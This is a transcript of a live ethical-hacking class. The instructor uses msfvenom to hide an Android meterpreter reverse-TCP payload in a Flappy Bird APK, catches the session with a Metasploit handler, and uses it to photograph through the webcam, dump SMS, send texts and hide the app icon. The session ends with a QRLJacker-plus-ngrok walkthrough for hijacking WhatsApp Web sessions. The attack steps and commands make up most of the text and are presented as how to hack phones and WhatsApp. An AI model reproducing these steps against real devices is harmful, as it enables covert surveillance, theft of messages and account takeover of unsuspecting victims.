Hello everyone, good evening. Welcome back. Am I audible? Okay, all right, great. So let us just continue from where we had left off yesterday. Right, so previously I think we were dealing with a little bit about Metasploit, how to work with Metasploit, and then we saw a little bit about SQL injection. Yeah. So there was a thing about the mobile thing which did not work. Let's we'll just try to explore that part a little bit. Yeah, so let me just turn on my virtual machine. Okay, now I hope you can see my screen. I'm just trying to turn on my virtual machine, just give it some time. All right. So we were discussing a little bit about Metasploit, right? So we will just check this thing. Right, let me just go to this and then go to CD desktop, right? CD desktop and then ls ls, and here I will just go into say sudo su kali, and now let me just create the thing for msf venom -x, right? And then let me just select the p. Okay, so if I had used the msf venom here, as I was just using this -x, and then I will use the same thing here for the Flappy Bird, that same APK file which I'm going to use. Correct. So I just wanted that name there. Flappy Bird v1-3.apk. Okay, then rest it's all the same. Android slash meterpreter slash reverse underscore TCP, and then lhost equals to 192.168. I will have to check what is the new IP address which is assigned. Right, so from ifconfig, I just get that, right? 168.43.254. Okay, it was already the same thing. And then the L port is going to be 5555 space hyphen O. Let's I'll just call it as a game.apk and then press enter. Now let me just see what is going to happen and what is the APK file which is getting generated. Okay, right. So we'll just give it a little time. Also in the background, I will just open up the browser so that I can just share this thing. Right, so no platform was selected, choosing MSF module Android from the payload. No architecture selected, so selecting Dalvik from the payload. And the next thing, it should actually give me a file, creating signing key and a key store. Right, so let me just go to google.com. Right, so from this, I will just go to this vTransfer. Right, in this vTransfer, I will actually be sharing this file. So this is still generating that APK file. So after that, I will just share it and then we will see. Right, we're still waiting for this file to get generated and then shared. Okay, X is used here for mentioning that take a custom file. So here we are taking an APK file, right? So we have to mention that take a custom file and then that can be like an APK, that can be of any other file format actually. That's what we are mentioning X for. Yeah, yesterday's session will be uploaded. I think it was already uploaded. If not, now it'll be uploaded in some time. I'll just put a word to the sir. Right, so sir will make sure it'll get updated very soon. It should have been uploaded by now. If not, we'll just check. Right, so it's adding the payload as a package. It is adding the permissions as well to write the call logs, the contacts, the access location, change Wi-Fi, read SMS, call the phone, record audio, read contacts, set the wallpaper, every single thing. It is actually assigning these permissions. Okay. Now it is saved as game.apk. Right, so that is the file. Right, so this file needs to be shared here. So I will just use this vTransfer to upload and share this file. Right, so game.apk is the file which I have to share. Let me just get a link for this now. Okay, now that we've got a link, right, so we can actually try to say open this on the phone. Right, so let me just take this on my phone and then try to open it here. we.tl/t hyphen VLNUP 9JF4E. Right, so let me just try to download this file. Okay, v.tl t hyphen v lnup 9 j f4e. Is it? Just a minute. I will just share this thing on my phone. Okay, so now I've got this file on my phone. I just shared it via WhatsApp, that's all. Right, I've got the APK file. So now it will ask me, do you want to install this application? Right, and then once I just give this confirmation to install, just give done. Right, so now I have installed this app on my phone. I will show you what it is going to access, or how is it going to access this thing. Right, so there are a few more commands which we need to type. So this is for sending the connection and then getting the file, APK file installed. But we require the other things as well. So what exactly are those other things? First of all, I need to set the handler, and then I need to use the exploit, right? And then after that, I actually need to connect as well, right? So first, let me just take this and open MSF console. Here, the same way how we did it for Windows, but in this, instead of using the term for Windows, we use it for Android. That is the only difference. Right, so I just give use exploit multi handler, and after that set payload for Android, set localhost, set local port for the listener port, and then exploit. Right, after that I just have to log in or show the thing from my phone. So now it says use exploit multi handler. That's it, configured for a reverse TCP. Now I need to set a payload for Android, reverse TCP, sorry, Android metapreter. Again, we will take the metapreter itself, slash reverse TCP, right? And then set L host as 192.168. Okay, 168.43.254. Right. So let me just check that if I'm not wrong. It is 43.254, and then set L port is 5555, and then finally exploit. Right, so it has now started the reverse TCP handler on this connection. Now let me just try to open the app. Initially, it will just ask me an installation thing. Choose what to allow Flappy Bird to access. Right, so depending on what permissions you give for this app, right, so those things are gonna work. So it has asked me this permission, right? So it has asked me this permission on my phone. Choose what to allow Flappy Bird to access. I've just given all the things and then given continue. So immediately, as soon as I did that, you can see that it started to initiate a connection, and then it gave me a Metapreter session. It says Metapreter session 1 opened. And on my phone now, I'm able to actually play this game, right? So because this APK file was of the game, right? So although it has turned on the Metapreter, now I'm able to play the game. And even if I actually close this thing, I'm still having access to it, right? So even if I close that game now, I'm still having access to it, right? So let me just check sysinfo now, right? So let me just check the details or information about the phone, right? So if I give sysinfo, okay, 1 second, exploit, it started the reverse TCP handler, Metapreter session open, sysinfo, right? It's telling me that it is an Android 10, right? It's running on localhost, and then the Metapreter session which I've used is this thing. Right now, I will give the help commands. Right. So, what all things are there in this? What all apps are there? Right. So, it's like this help command is slightly different from the one which we had. This is how you hack into an Android phone, right? So, you can see an Android 10 phone is now being hacked. Right. So, in this, the help command is slightly different. Right. So, let me first like clear this. Okay, not possible. So, help, and then you can see what all things are there. Right. So first of all, you know all these core commands are same, correct? Then file system commands are also same, like creating a directory, listing all the files, and then moving the file, searching for a file, removing a directory, uploading a file, are all same. Coming to the networking, also not much to do, right? So when you just go to the system, also it's all just the same. Okay. I think we've got a few extra things here, like these are all there here, correct? So if I just give this option of the webcam snap, right? So you can just see the thing what it does, right? So I'll just give webcam snap, and then we'll just see what it is going to do. Right, webcam underscore snap. Right, so it should immediately take a photo of this and then send it. Okay, Metapreter session close died 1 second. Exploit. Okay, started reverse TCP handler, and now let me just go to this thing. Okay, I think I'll just close this app on the phone, and then maybe we can just do it again. It's a show options. Maybe it's not getting the connection properly for it. Yeah. So let me just select all of those things again, like use exploit multi-handler, right? And then set the payload, and after that set the host and set port, and then exploit, right? So once this is started, let me just rerun that game, right? So let me close and open the application. Okay, now as soon as I closed and opened the application once more, it has given me the Metapredator session 3. So now I think we are good to just continue, right? So let me just check again for sysinfo. It is giving me all the details. So it was like webcam underscore snap. Right, it's starting the webcam automatically, got the frame, and then it is getting the screenshot. Okay, right, so it has got this frame. Maybe I can just turn around the phone so that it captures it from the other camera, right? So you can also mention which camera's image you want, I guess, right? So you can actually have a list to select the webcam, right? So webcam underscore list is also available, like back cam and front cam, right? So by default, if I just give webcam underscore snap, now it should actually capture this dot frame. Yeah. So it's giving me this captured photo from my phone's camera, correct? So this is how you're getting access to the thing without you being using anything there. Right? I've not given any permission like right now. Initially, while installing, you have to give all the permissions. So it depends on that. Okay. How to connect mobile hotspot? Navneet, connect mobile hotspot to what thing exactly? If you could just tell me, then I can tell you. How to secure a hacked phone? Others, the best way to secure a hacked phone is just to format everything. It's like to perform the hard reset option. Yeah, for this attack to work, both the victim and the attacker have to be in the same network, right? No, not really, Sham. This you can just use on any other thing as well. Unnecessary, it works. I'm not installing in my phone. Okay. What is the reason exactly? If you could just let me know what is the version of the Android which you have, because this works on Android 10 and on Android 11 also. Right, so if you follow these steps, then definitely it should work. How to create that MSF Venom, the same steps. Okay, sorry, not in this. MSF Venom steps, you just have to see. Okay, how to connect mobile hotspot in Kali Linux in VirtualBox. Okay, it's like Navneet, you actually have to say install the adapter, because by default this is going to convert your connections into an Ethernet network or a wired connection. So Kali Linux has got this network adapter issues wherein you actually have to install a network adapter. You actually have to enable. Say if you wanted to connect to a mobile hotspot, then there is something which you need to enable and then use separately, right? So right, so you actually get this thing here. I'll just tell you what to do, how to configure and troubleshoot this Wi-Fi adapter, because right now we're just using only the wired connection. Right, so for your Wi-Fi adapter, first of all, you actually need to download one file. Okay, so it's like if you wanted to connect the Wi-Fi. So if I just come on, just a minute, I will go to that thing. First, let us finish this thing about the Metapredator. And in the Metasploit, we'll just finish this thing off. another 2 minutes, and then we will go to the other things, right? So now if I just go to this help, right, I can actually install an app, I can actually download an app. Let's say if I just give app list, now it will give me the list of all the apps which are there on my phone right now. Okay, so it's gonna do that as soon as I give this app list thing. Okay, I think the connection got interrupted. Okay, yeah, now it should work. What if the malicious file is in the root directory? Will formatting fix that? Yeah, pretty much, because once you do the hard reset, every single thing on your phone is going to get erased. Right? So yes, it will. See, these are all the applications which are there on my phone, right? So whichever it is, I can just go ahead and then use that. I can actually run an app. I can install an app. I can uninstall an app. Right? So if I wanted to say send an SMS, right? So I can do that also. I can set the audio to the ringer mode, right? So if I just give set audio mode, right? So ringer mode was changed to 1, right? So I've just set it to the ringer mode, right? So if I want to send an SMS, right? So I can just give send SMS. This is the format which it is asking, right? So you must enter the destination address and the SMS text body like -d to whichever number and then to whatever things you want, right? So if I just give send SMS -d and give say +91, right? So I'm just putting some number. Okay, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10. Right, and then give -t and then say greetings. Right, so this is the message which I'm trying to send. Okay, it says transmission failed. Right, but then this is the thing how you send an SMS. Right, other than that, if you want to say geolocate, okay, geolocate is probably you have to turn on the location and everything. Let's say you can just get the dump SMS, right? So if I give dump underscore SMS, let's say it has downloaded 188 SMSs and then it is saving it here, right? So it's probably in the home directory, home Kali. Right, so you can see here we have got the SMS dump, correct? Right, so all of these are the SMSs which we have got. Right. So other than that, you can get the call log as well. You can get the record mic, webcam stream. You can get the screenshot, the screen share, and all are the same commands. Okay. The Android commands are specifically these things. If you want to hide the app, whichever you just had right now, right? So you can hide the app also by giving hide app icon, right? So this Flappy Bird activity, that file is no longer going to be there, right? So it is now hidden. Okay. So the next time if someone wants to see that, you cannot even find that app. Right. So if you wanted to enable or disable the wake lock, you can just do that as well. Okay. Right. So this is how you use the Metapreter. Let me just exit this and then come out of all of these things. Okay. Fine. So that was about how you use the Metasploit thing. Now, for enabling the Wi-Fi in here, right? So you actually need to follow a lot of steps like troubleshooting the Wi-Fi adapter is one of the main thing which you need to do, right? So in troubleshooting this, you actually need to download a compact wireless file actually, right? So compact wireless 201006 26 star file. Right, so it's like you actually need one of these files. Right, actually this file is required for enabling this wireless. Right, so this is actually the older one, I guess. Okay, no problem. We'll just try with this wireless option. Right, so once this thing is here, I will just extract this file and refresh. Okay, so if I just open up a terminal here, so ls, I've got this file, right? So I will just give tar jxvf and then mention this file name, right? So .tar .bz2, and then after this, this is the file name which I had, which I actually wanted to extract. So once I just do this, I am actually going to press enter. So it will extract all the files inside it and then give me the extracted ones, right? So ls is now this file is extracted into a say separate folder actually, right? So once I've got this extracted file, right, so I've got this extracted file and then the folder. So I'll just go inside this folder, and inside this folder I've got all of these things, right? So there are so many files. So let me just try to just give one thing like sudo make unload. It will ask me for the password, right? And once this is done, I will just give sudo make load, right? And then it will just load a few things and it will just connect, right? So once this thing is done, right? So let us just see here what is there after this. And so I'll just give something like airmon-ng. Right, so immediately you will have this WLAN 0 and WLAN 1 option enabled. Okay, and here also you can see Wi-Fi network WLAN 0 and WLAN 1 is now being enabled. If you just do this, so it's like you need to download that one file, right? And once you download that one file, you will have the Wi-Fi network, right? And then WLAN 0 and WLAN 1 will actually enable. This is for the Wi-Fi 802.11 radios for all of these things. You can actually connect to the external Wi-Fi from this. Okay. So if at all you just wanted to find this, I can just give ifconfig and then here, what is being shown here? That's I think previously we were finding only the ETH0 and then sorry, and then the loopback. But now we have got the WLAN 0 as well as the WLAN 1 as well in this, right? So from here, so there is one more thing that you need to connect an external network adapter for Kali, right? So this Wi-Fi will not work on Virtualbox and Kali. This will still be disconnected. If you wanted to connect it, you have to use an external Wi-Fi adapter like an external device, because there is this network interface problem which is there in the recent versions of Kali, like above 2020. So for us to just enable this thing, right? So we actually need to have the external USB type the Wi-Fi adapter, right? So only then we are going to get this WLAN 0 and WLAN 1 enabled. But first thing is you have to enable this by giving this make sudo make load as well as the sudo make unload, right? So then you can just check, right? So it has to do all of these things. Only then you get the option, right? So without that, you're not even going to get the option. Right, so there is this thing that after this you can actually connect to the networks. Now, okay. So the next and last thing which we'll just see here is how do you actually get access to someone's WhatsApp? That is like we've got something called as a QR code scanning and then a QR code chat, right? So there is one thing from OWASP. Okay, so there is a thing from OWASP. There is something like OWASP QR code hack, right? So you've got something called as QRL jacking, which we can do by using this OWASP. Right. Okay. Can we get the WhatsApp chat? Yes, you can get WhatsApp access as well. Right. So if you just copy this, there is this tool which is already there. So let me just go to the desktop. Right. So CD desktop ls. Right. And then let me just give git clone. Right. So now let me just go into that folder for QRL jacking ls cd QRL jacker. And I'm trying to go into this folder. Now I actually have to run this file python space qrl jacker dot py. Right? And then they've mentioned a few steps, right? So here you can just refer to the steps. I will give you this URL in the chat here. Okay, what's happening? Yeah, this thing. Okay, so just sent you this code. Yeah. So inside this, just scroll down, like first go into this folder called as QRL jacker and then scroll down. And in here, if you just see, you will actually get all the steps, what all things you need before installing. So first you need to install the Gecko driver for the Firefox browser, right? So if we are using the Firefox browser, then we need to use the Gecko driver. Okay, how to find the port, Neeraj? To find the port, we have to use something called as nmap, or we can use, say, nmap port scanner, or to check the open port, you can use something called as netstat. Netstat will also help you find the open ports. Right, so I will just take this file, which is like 2.5 MB. That file I'm actually going to download, right? Because this is required for this. Gecko driver is required for my WhatsApp hacking. Right? So once I just get this file installed or downloaded, what else do I need to do? Just open up that and then right click, open the terminal and follow the steps which were mentioned here. Right? So before installing that thing, I have to run these four steps. Right? So these four steps are chmod plus x ls, right? And then I think this is in cd desktop ls. Okay. Right. So first I need to extract this file, this Gecko driver, and then give ls, and then give chmod plus x Gecko driver. Move that file, sudo move the Gecko driver. and then ln, like these are all like the configuration files to install this Google Gecko driver. Copy and then paste this as well. Right, so those were the 4 steps. Now I've cloned the repo. I actually need to install the requirements here. Right, so there is a requirements file which I need to install, and then I can just run the qrljacker.py file. Okay, so we'll just install this requirements and then wait for a minute. In the meantime, if you have got any queries, just let me know. Right, so I think from the last 1 week or so, we've been learning a lot of new things. So if you've got any queries with respect to what we have learned, you can just let me know. And because this is your last session, and tomorrow I guess you've got your exams probably. Right, so prepare well, and I think whatever we have learned till now is of some use to you. Okay, knowledge-wise as well as the exam point of view. Yeah, any questions, you can just let me know. In this meantime, I'll just tell you what to do here. Aryan, so what we did here is, it's actually mentioned, everything is mentioned here. So first thing is, um, update the Firefox browser to latest version. Basically, we've got this thing updated. So we need to install the latest Gecko driver by opening this thing. Right, so by opening this and then selecting this 2.55 MB file. Right, so by selecting the 0.30 version, you can just download this. Right, and then we'll just follow all of these steps. Then clone the repo, right, and then go inside this. Here, install the requirements, then just run that cell. Okay, so right. Um, if you have any doubt how from tomorrow how to contact you, okay, you can just put a message in the group, and sir will just try to redirect it to me. Okay. For Kali Linux, there is actually a thing directly from the OWASP itself. And so OWASP itself has an ethical hacking book directly to learn for Kali. It's ethical hacking from OWASP. Right, so we've got this book from OWASP itself for learning Kali. And so there is actually a PDF also which you can download for hacking 101. Yeah, the session will be uploaded for yesterday's and today's immediately after this. I'll just inform sir to upload it immediately. And okay, on which platform the exam will be conducted? Okay, everything related to the exam, the details are with sir. Sir is already there in the group. I've also shared sir's number with you all. Right, the MCQs or the practical, whatever it is, you can please check with that format with sir because I am not really aware of the format yet. So can I use the Droid Cam app to use my phone as a webcam? Okay, a Droid Cam is I think this thing, right? So there are actually many versions of this Droid Cam, and then there is like Droid, which you have got. So you can actually turn your phone into a webcam there for your PC. You can actually do that just by like setting up. There is one app which you need to download, and then you can set up your phone to be a webcam for your PC. I think it works only on Windows and then Linux. You cannot do it on Mac. You connect it via Wi-Fi and then you'll have an IP address which you need to do. Yes, so you can just do that. It will work. Yeah, just coming to this part. So just coming to this part for Python 3 qrljacker.py, right? So this is the thing which it should give you, right? So once you open this QRL jacker, this is what you should be given, right? So now we actually will get a few options that I have to run. Like, first of all, just give options, right? So use grabber slash WhatsApp is the first thing. Now, if I just give options, it will ask me to set the port as well as the host. Right, so let me just set the port as 1337 and set the host. Right, so host is 192.168.43.254 as the host. Right, and then if I check options now, both of these things are changed. So once this is done, I can just give run. Right, so I'll use the default user agent. Right, so once it just uses this default user agent, I will actually check. Aryan, I am not sure about that. I don't think so. Okay, so here it has initialized this web server and then it has checked. Right, so it has initialized this web server and then a session is ready here. Right, so if I just give session, right, so I actually have to turn it on. Like I actually have to scan this thing from my phone. Right, so for that, I will have to use ngrok. Correct, so what was that in this? So here I had this ngrok here, right? So I will just give dot slash ngrok http, but this time it is 1337. Okay, so on this link, right? So this link you can actually share it to the victim on the Windows system or use it here also. Not a problem, right? It's ultimately that you need to make sure that the person captures. Okay, just a minute. That you get a QR code and then a person is able to capture that. Okay, it says back gateway, right? So I think I've just said this here. Let me give run. Right, the port number is 1337. It uses the default user agent, and in the meantime, I can just start off with this thing. Right, so it'll just create that QR code and then wait for the sessions and initialize the server. Right, and that time, okay, it says already in use, which means that this is already active. So hopefully we get this thing here. If not, we'll just have to reinitiate everything and then start from the beginning thing. The same things. Okay, it says tunnel not found, so I'll just have to initiate all of these things again. Can't open file, no such file or directory. Maybe you have not done the git clone thing right, or you are in one folder behind. Please check. Gaurang. And I'll just check the IP address again. Yeah, I think this thing got changed. That is the reason it was not able to give. Yeah, 192.168.43.254. Okay. So once I just do this options and then I can give run, you give the default user agent and then checks for this output. Okay, no, Navneet, that is not really possible. It's not so easy to do that. Okay, actually, this issue with ng keeps persisting. And so all that you get is in the same thing. You just have to get the QR code is what you get. And so let me just check if there is something captured. Yeah, so you get this QR code, and this QR code, once you say scan, what happens is instead of this person getting access directly, right? So you are going to get access. And so instead of the person getting access, you are going to get access. So it has got the session on WhatsApp. Now I can just give sessions and give sessions hyphen I and then give 0. Right. So what happens if I do this? Right, so it will start this interaction with 0 and then it will just connect to that. It is gonna open up my WhatsApp. So basically it should be like you have to give your IP address is to the port number. Okay. Right. So this is now giving me my actual WhatsApp, but it is me, right? So I've got this victim's WhatsApp, which I have. This is not a fake URL. It's a genuine URL, web.whatsapp.com itself. Right. So this will give you all the chats. Okay. Fine. No, just by getting their number, not possible like this. You actually have to get access of the complete phone, right? So if you just get the same thing from Metasploit, it is possible to do because you will have access to the entire phone. You can just run the app with the app, do all the details. So like these are all the WhatsApp chats which I have got. Right, so this is now my WhatsApp. Right, so just log out here. Then I'm going to get all the details. Fine. Yeah, I think with that, we'll just wrap up here. We'll just stop. Yeah, hope you all learned something. You all understood a few things. Yeah, I'll make sure that these recordings are given to you very soon so that you have got a little time to prepare as well. Okay. Yes, thank you all. Thank you for being so attentive and enthusiastic to learn. And all the best. And I'll just stop my screen share and then you can now leave. Thank you so much for attending.